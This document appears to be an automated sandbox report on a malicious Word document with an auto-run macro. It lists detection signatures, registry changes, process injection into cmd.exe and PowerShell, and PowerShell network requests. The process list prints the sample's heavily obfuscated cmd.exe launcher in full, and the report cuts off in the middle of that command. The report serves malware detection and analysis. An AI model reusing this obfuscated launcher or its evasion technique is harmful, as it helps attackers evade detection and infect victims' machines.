Malware Analysis Report

2024-10-16 06:29

Sample ID 240525-svl4pahd92
Target 7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118
SHA256 b770af4b04ceb9dce64f081c25a3297389b19a5ed757e020c06f9427ef76c03f
Tags
macro macro_on_action
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b770af4b04ceb9dce64f081c25a3297389b19a5ed757e020c06f9427ef76c03f

Threat Level: Known bad

The file 7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Office macro that triggers on suspicious action

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 15:26

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 15:26

Reported

2024-05-25 15:30

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 3024 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2892 wrote to memory of 3024 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2892 wrote to memory of 3024 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2892 wrote to memory of 3024 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2892 wrote to memory of 3300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 3300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 3300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 3300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 3300 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3300 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /V^:^oN^ /c "^se^T ^ ^ ^ R^0=^LF^M^A^z^K^P^G^Q^Sw^zkDS^P^aOFb^tKvl^3R^d^6=^i^5^2^u-N^q^h8^E^Xr^YCm9^gs^jo^f^ VHJ7cneT^0^Bp^y^1^W^U^4IZ&&^FOR %^S ^IN ( 6^1^ 48^ ^ ^1^0^ 57^ ^40 ^4^6 ^ ^ ^36^ ^ ^5^7^ ^23 2^3 ^ 50^ ^3^3 ^57 50 53^ ^ ^3^ 60 ^ ^ ^15 3^ ^ ^ ^3^8^ ^ ^48 ^ ^3 55^ ^3^ ^3 ^ ^4^4 ^3 ^7 ^ 66^ ^3^ ^68^ 8 6^0^ 2^4^ 3^ ^4^2 5^9 ^ ^ 3 ^ ^1^9^ 10^ ^ ^60^ ^ ^ 29 ^ ^3 ^ ^ 7^ ^ ^ 48^ ^ 3^ ^68 ^8^ 60 47 ^ 3^ ^ ^5^2^ ^ ^ 8 3^ ^6^7 ^ 3 ^60 1^7 ^ ^ ^ ^3 ^7^ ^6^5 ^3^ ^ ^2^6 ^ ^3 ^ ^ 3 ^ ^ 3^2^ ^ 3 ^ ^18^ ^ 55^ 3^ ^ ^ 6^8 8^ 6^0^ ^ ^2^9 ^ ^ 3 38 ^ 2^ 3 1^9^ ^ ^ 3^ ^ 60 6^1 3^ ^ 7 ^6^5^ 3 ^19 4^5 60 ^ 59 ^ 3^ ^ ^1^3 ^46^ ^3^ ^ 5^3^ 3 ^60^ ^ 2^7 ^ ^ ^3 ^18^ 12^ 3 ^ ^1^6 ^ ^45^ ^ 3^ ^44^ ^3^ ^4^2^ ^ 55^ 3 ^ ^ 1^6^ ^3 ^ 60^ 59^ 3 52 ^ ^ 8^ 3^ 55 ^3 ^ ^3^ ^27^ ^ ^ ^3 4^2 3^7^ ^3^ ^0 1^0 ^ 6^0^ ^35 ^ ^ ^3^ ^ ^7^ ^3^7^ 3 ^ ^ 4^1^ 4^5^ ^60 ^ ^ 3^6 ^3^ 5^2^ ^67^ ^3 ^4^1 45 6^0^ ^36 ^3^ ^ 4^2^ ^ ^66 3^ ^ ^ ^4^1^ ^10^ ^60^ ^ ^22^ 3 ^7 ^ ^ 5^9 ^ 3 ^0 ^ ^ 1^0 ^60^ ^2^4 ^3^ ^ 5^2 3^ 3 ^ ^ 0^ 8 ^ 60^ ^47 ^ ^3 ^ 7 ^ ^37 3^ 1^9 4^5^ 6^0 ^ ^ ^ 59^ 3 ^ ^7 ^ ^ ^ ^6^5 ^ 3 ^19 ^4^5^ ^60^ ^ ^ 5^9^ ^ 3 ^4^2^ 37^ ^3 ^68^ 3^ ^60^ 1^1^ 3^ ^ ^ 5^2 ^8 3^ 6^8 ^45^ ^ ^3 ^31^ ^3^ ^3^8^ 3^ 3^ 1^6^ 3 ^6^0^ ^ 59^ ^ ^3^ 5^2 ^8 ^ 3 ^5^5 3^ 3^ ^ ^ 27 3 ^ 42^ ^ ^37 ^3 ^ 0^ ^1^0 ^ ^ 6^0 ^ ^46^ ^3 ^7^ ^ 12^ 3 6^8 ^10 6^0 48 ^3^ ^ ^52 